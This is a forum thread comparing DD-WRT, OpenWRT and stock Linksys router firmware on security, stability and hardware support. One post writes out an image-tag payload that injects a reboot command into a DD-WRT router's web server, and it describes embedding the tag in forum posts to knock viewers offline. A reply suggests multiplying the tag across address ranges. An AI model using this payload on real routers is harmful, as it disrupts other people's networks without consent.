Sign in to follow this  
Followers 0
Engineering

Your thoughts about DD-WRT....

24 posts in this topic

How good of an idea is it to rely on DD-WRT firmware to handle router security instead of it's manufacture's firmware?

How reliable is this firmware? Stable?

Robust security? No malicious source code? Backdoors?

What are you experiences with DD-WRT... any thoughts, comments, or concerns?

0

Share this post


Link to post
Share on other sites

I'd recommend it. I run it on both my WRT-54G routers, and it is far more robust than the standard Linksys firmware. Really, the only reason I bought the routers was to run it. Just be be sure the router you purchase will run the full version, as there are many different configurations for routers of the same model. Just do your research and check the serial numbers with that provided at the DD-WRT site.

As for back doors one would have to analyze the code and look for a "backdoor" user and passwd, which I have not done.

Edited by tekio
0

Share this post


Link to post
Share on other sites

How good of an idea is it to rely on DD-WRT firmware to handle router security instead of it's manufacture's firmware?

How reliable is this firmware? Stable?

Robust security? No malicious source code? Backdoors?

What are you experiences with DD-WRT... any thoughts, comments, or concerns?

The thing about both DD-WRT and Linksys's firmware is that the source is out for both of them. You can check for backdoors, and as heavily worked on as both are, any would have been found and announced by now.

DD-WRT uses iptables I believe for its firewall. IPtables is old and well established as one of the best firewalls out there.

0

Share this post


Link to post
Share on other sites

I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.

0

Share this post


Link to post
Share on other sites

I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.

There was a vulnerability for DD-WRT that was published a while back. It's only a problem if you have decided to allow management of the router via the web. That's probably not a very good idea anyway. The info is here.

http://www.dd-wrt.com/dd-wrtv3/community/developmentnews/34-dd-wrt-httpd-vulnerability-milw0rmcom-report.html

0

Share this post


Link to post
Share on other sites

I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.

There was a vulnerability for DD-WRT that was published a while back. It's only a problem if you have decided to allow management of the router via the web. That's probably not a very good idea anyway. The info is here.

http://www.dd-wrt.com/dd-wrtv3/community/developmentnews/34-dd-wrt-httpd-vulnerability-milw0rmcom-report.html

Well, there's more to it than that.


<img src="http://192.168.1.1/cgi-bin/;reboot">

Combined with an img bbcode tag on these forums (with a redirect if needed) and anyone who views your thread is kicked offline.

0

Share this post


Link to post
Share on other sites

How good of an idea is it to rely on DD-WRT firmware to handle router security instead of it's manufacture's firmware?

How reliable is this firmware? Stable?

Robust security? No malicious source code? Backdoors?

What are you experiences with DD-WRT... any thoughts, comments, or concerns?

I just recently started using the DD-WRT firmware on my router, I started using it because I have alot of outbound connections and as Ohm said the linksys firmware just doesn't cut it. I like the expanded functionally of the firmware as well as the fact that i can set up my own custom IP tables filter rules if i want

0

Share this post


Link to post
Share on other sites

Because DD-WRT's filesystem is read-only in memory, I prefer OpenWRT. I'm currently run OpenWRT on four corporate routers, two of which are used by the company as dedicated OpenVPN appliances.

0

Share this post


Link to post
Share on other sites

I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.

There was a vulnerability for DD-WRT that was published a while back. It's only a problem if you have decided to allow management of the router via the web. That's probably not a very good idea anyway. The info is here.

http://www.dd-wrt.com/dd-wrtv3/community/developmentnews/34-dd-wrt-httpd-vulnerability-milw0rmcom-report.html

Well, there's more to it than that.


<img src="http://192.168.1.1/cgi-bin/;reboot">

Combined with an img bbcode tag on these forums (with a redirect if needed) and anyone who views your thread is kicked offline.

Anyone who leaves their router/network on the default network range isn't security minded in the first place.

0

Share this post


Link to post
Share on other sites

So make 256 of these image tags.

0

Share this post


Link to post
Share on other sites

I was just discussing DD-WRT with a friend the other day, and he recommended OpenWRT instead.

Does anyone have any experience with OpenWRT? What are the practical differences between OpenWRT and DD-WRT?

0

Share this post


Link to post
Share on other sites

My main reason for choosing DD-WRT was because there are mini versions for the lesser powered Lynksys WRT-54G's (like the GS series). I tried open-wrt, but it bricked my router due to my own lack of studying on my part. After installing a mini-version of DD-WRT via TFTP it came back to life.

0

Share this post


Link to post
Share on other sites

So make 256 of these image tags.

Not just 256. You would need alot more than that.

192.168.x.x

172.(16-31).x.x

10.x.x.x

And that's if they stick within the reserved private ip ranges.

I was just discussing DD-WRT with a friend the other day, and he recommended OpenWRT instead.

Does anyone have any experience with OpenWRT? What are the practical differences between OpenWRT and DD-WRT?

OpenWRT is alot more flexible with hardware mods. OpenWRT on the fonera or Linksys was the first to have bit-banging i2c and SD card interfaces, and DD-WRT hasn't successfully ported most of those features, but tries to keep up. Better packaging system too.

0

Share this post


Link to post
Share on other sites

That's also assuming the router's address is .1 as well. I guess the point is having your router on a non-default network, possibly with a host address other than .1 will prevent blind attacks like this.

0

Share this post


Link to post
Share on other sites

The firmware won't run on my router, so I'm going to have to buy a new one anyway. I'm mainly just looking for the VPN and client mode functionality. Any recommendations for routers?

0

Share this post


Link to post
Share on other sites

To work with dd-WRT, the router would have to be a Linksys WRT-series.

Some of the newer (smaller, all-black) ones lack enough memory to support dd-WRT. Pick up one of the classic Linksys "black-and-blue" models and you should be fine. I have a WRT300N model 1 and it runs great under dd-WRT, even better than the original Linksys firmware. I've used it as a wireless bridge, a VPN router, and even as a network adapter for an old laptop with no onboard wifi or USB.

0

Share this post


Link to post
Share on other sites

To work with dd-WRT, the router would have to be a Linksys WRT-series.

So wrong, that "Wrong!" is not enough. :P

http://www.dd-wrt.com/wiki/index.php/Supported_Devices

http://www.dd-wrt.com/dd-wrtv3/dd-wrt/hardware.html

dd-wrt runs on more routing hardware than toasters run linux and pornsites have popups.

Wholly shit! That IS impressive.

Though I have had trouble installing it on those newer Linsys WRT models.

0

Share this post


Link to post
Share on other sites

Though I have had trouble installing it on those newer Linsys WRT models.

Most newer WRTs have a VXWorks platform instead of just linux, so it is harder to replace. Also, skimping on hardware options like flash and ram made full dd-wrt options impossible, so you get the mini packs. Eh.

0

Share this post


Link to post
Share on other sites

I am still curious to the operating differences between DD-WRT and OpenWRT. Time to do some research.

0

Share this post


Link to post
Share on other sites

My conclusions as for as the philisophical standpoints of the two:

OpenWrt is geared more toward customization e.g. OpenWRT has a package/addon management system.

And DD-WRT is a all in one solution deal being simplistic.

Edited by schippystrich
0

Share this post


Link to post
Share on other sites

Well, I may be drifting away from the question asked but.

I have 3 routers in my house, 2 DD-WRT and 1 that runs OpenWRT.

All the DD-WRT routers work perfect, all full version installs running on WRT54G pre 5version routers, though for me OpenWRT kinda' has it's flaws. (And pros.) I use OpenWRT for ssh/php, even though DD-WRT can do it as well, it never was as good at it as OpenWRT was. But anywho, I can run IRC bots, and alike off my OpenWRT router. It's pretty neat, I'll give it that. OpenDNS for some reason has problems with my OpenWRT router too.

So... I guess my recommendation is, if you are just using it for a router (nothing special, other than maybe increasing the output of the wireless antennas) then I'd say go DD-WRT. If you're going to need the space, and want a very minimalistic experience in which you can copy over files, or even run a web-server off of. Then OpenWRT is for you.

Forgive my horrible writing technique, jumping all over the place, and bad grammar.

Oh right, and also. Towards exploits etc. DD-WRT isn't as vulnerable to this, but OpenWRT is known for its ...problems security wise. I can't remember where the article was, but reports said that douche-bags were using OpenWRT routers as bots for botnets, so. If you do go OpenWRT, pick a good password for administration? :3

Okay, hopefully that helped. *Dance, Dance, Dance*

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0